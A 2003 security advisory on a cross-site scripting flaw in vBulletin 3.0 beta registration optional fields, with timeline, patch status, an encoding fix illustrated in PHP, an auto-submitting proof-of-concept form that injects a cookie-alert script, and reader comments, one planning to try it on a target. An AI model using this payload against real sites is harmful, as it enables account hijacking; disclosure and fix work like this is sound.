VBulletin New Member XSS Vulnerability

Tags: no_tag, 06.08.2003
------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attack is possible. With this vulnerability an attacker could access other users' and admins' accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP-based popular forum application.
Vendor & Demo; www.vbulletin.com
------------------------------------------------------
Description;
------------------------------------------------------
On the new member page (register.php), if you skip a required field the system redirects you to the same form and automatically fills in the fields you entered before, for a better form experience. In the standard fields vBulletin handles script injection successfully, but not in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc. So you can execute any JS through these fields.
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2 to Beta 7
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 3.0 Gamma
vBulletin 2.3.0
vBulletin 2.2.8
...
------------------------------------------------------
Vendor Status and Patch;
------------------------------------------------------
26.01.2004, Problem fixed. Update to vB3 Gamma or later.
------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Published : 06.08.2003
------------------------------------------------------
Solution;
------------------------------------------------------
HTML-encoding these fields like the other inputs is sufficient.
------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace [] with <>

Ferruh Mavituna
http://ferruh.mavituna.com
Web Application Security Specialist
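As an added illustration of the Solution section above (example code written for this page, not vBulletin's or the author's own), here is the unencoded re-fill pattern the advisory describes beside the HTML-encoded version; the field names, the constants and the helper function names are assumptions:

```php
<?php
// Added example, not vBulletin code. Field names and helpers are assumptions.

// Required fields: leaving one empty sends the user back to the form.
const REQUIRED_FIELDS = ['username', 'email', 'password'];

// Optional profile fields that the advisory found re-filled without encoding.
const OPTIONAL_FIELDS = ['field1' => 'Biography',
                         'field2' => 'Occupation',
                         'field3' => 'Interests-Hobbies'];

// Vulnerable pattern: the previous input is echoed straight into the value
// attribute, so a quote in $value closes the attribute and '<' opens a tag.
function render_field_vulnerable(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened pattern: encode with ENT_QUOTES so both " and ' are escaped,
// which is what the advisory's Solution section asks for.
function render_field_safe(string $name, string $value): string
{
    $n = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $v = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="' . $n . '" value="' . $v . '" />';
}

// Re-render the registration form when a required field is missing, carrying
// the optional answers over through the safe renderer. Returns null when all
// required fields are present and registration can proceed.
function refill_form(array $post): ?string
{
    foreach (REQUIRED_FIELDS as $f) {
        if (!isset($post[$f]) || trim($post[$f]) === '') {
            $html = '';
            foreach (OPTIONAL_FIELDS as $name => $label) {
                $html .= $label . ': ' . render_field_safe($name, $post[$name] ?? '') . "\n";
            }
            return $html;
        }
    }
    return null;
}

// Constructed sample: username left blank, biography contains characters
// that break out of the attribute if echoed raw.
$sample = ['username' => '', 'email' => 'a@example.invalid', 'password' => 'x',
           'field1' => 'Reads "<b>books</b>"'];
echo "Vulnerable: " . render_field_vulnerable('field1', $sample['field1']) . "\n";
echo "Hardened:   " . render_field_safe('field1', $sample['field1']) . "\n";
echo refill_form($sample);
```

The vulnerable line emits `value="Reads "<b>books</b>""`, a second attribute boundary and a live tag; the hardened line emits `value="Reads &quot;&lt;b&gt;books&lt;/b&gt;&quot;"`, which the browser shows as plain text.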


ErKan Cengiz - 14.07.2004

Oh, now I think I get it, it goes like this: we edit this code in a text editor

[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]

where it says victim, the target site goes there

and our text file gets saved as a web page, I guess, and then when it's opened, if the site has the vulnerability, it gets in, something like that, but I'm not totally sure, I'll try it sometime... you're a man whose hand deserves to be kissed, Ferruh :) you've got real gems, teach them to us too

ErKan Cengiz - 14.07.2004

I still didn't understand a thing, honestly

- 06.02.2004

Thx a lot man for the info

:) - 19.12.2003

Come on, write these in Turkish, bro.
